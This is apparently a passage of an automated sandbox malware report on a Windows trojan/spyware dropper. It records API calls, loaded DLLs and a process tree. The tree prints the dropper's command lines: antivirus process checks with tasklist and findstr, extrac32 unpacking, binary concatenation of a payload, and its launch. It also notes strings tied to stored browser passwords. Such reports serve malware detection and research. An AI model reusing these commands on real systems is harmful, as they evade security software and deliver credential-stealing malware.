                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,2_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,14_2_0055F20D
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\UtilitySoccerJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\MoveRefurbishedJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeFile created: C:\Windows\ClarkWriterJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_0040737E2_2_0040737E
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_00406EFE2_2_00406EFE
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004079A22_2_004079A2
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004049A82_2_004049A8
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B526FB3_3_00B526FB
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeCode function: 3_3_00B5275D3_3_00B5275D
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0051801714_2_00518017
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0050E14414_2_0050E144
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_004FE1F014_2_004FE1F0
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0052A26E14_2_0052A26E
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_004F22AD14_2_004F22AD
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005122A214_2_005122A2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0050C62414_2_0050C624
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0052E87F14_2_0052E87F
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0057C8A414_2_0057C8A4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00562A0514_2_00562A05
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00526ADE14_2_00526ADE
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00558BFF14_2_00558BFF
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0050CD7A14_2_0050CD7A
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0051CE1014_2_0051CE10
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0052715914_2_00527159
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_004F924014_2_004F9240
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0058531114_2_00585311
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_004F96E014_2_004F96E0
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0051170414_2_00511704
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00511A7614_2_00511A76
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_004F9B6014_2_004F9B60
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00517B8B14_2_00517B8B
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00511D2014_2_00511D20
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00517DBA14_2_00517DBA
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00511FE714_2_00511FE7
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\768400\Climb.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: String function: 00510DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: String function: 0050FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: String function: 004062CF appears 57 times
                Source: CLaYpUL3zw.exe, 00000000.00000002.2262206337.00000000054F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameladdad.exe4 vs CLaYpUL3zw.exe
                Source: CLaYpUL3zw.exe, 00000000.00000002.2258493928.0000000000D62000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameladdad.exe4 vs CLaYpUL3zw.exe
                Source: CLaYpUL3zw.exe, 00000000.00000002.2260643842.00000000016AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs CLaYpUL3zw.exe
                Source: CLaYpUL3zw.exeBinary or memory string: OriginalFilenameladdad.exe4 vs CLaYpUL3zw.exe
                Source: CLaYpUL3zw.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.CLaYpUL3zw.exe.5d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                Source: CLaYpUL3zw.exeStatic PE information: Section: uppnmxuj ZLIB complexity 0.9946467484394031
                Source: Set-up.exe.0.drBinary string: Lntdll.dllNtCreateFileNtDeviceIoControlFileNtCancelIoFileEx\Device\Afd
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@28/23@10/3
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_005641FA GetLastError,FormatMessageW,14_2_005641FA
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00552010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,14_2_00552010
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00551A0B AdjustTokenPrivileges,CloseHandle,14_2_00551A0B
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,2_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_0055DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,14_2_0055DD87
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 2_2_004024FB CoCreateInstance,2_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 14_2_00563A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,14_2_00563A0E
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CLaYpUL3zw.exe.logJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile created: C:\Users\user\AppData\Local\Temp\PasoCattle.exeJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Climb.com, 0000000E.00000003.2537346329.00000000044A3000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2512597929.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2512758333.00000000044A5000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000E.00000003.2538857681.00000000045D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: CLaYpUL3zw.exeVirustotal: Detection: 52%
                Source: CLaYpUL3zw.exeReversingLabs: Detection: 50%
                Source: CLaYpUL3zw.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: CLaYpUL3zw.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
                Source: unknownProcess created: C:\Users\user\Desktop\CLaYpUL3zw.exe "C:\Users\user\Desktop\CLaYpUL3zw.exe"
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" Jump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmdJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ReflectJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com VJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\CLaYpUL3zw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
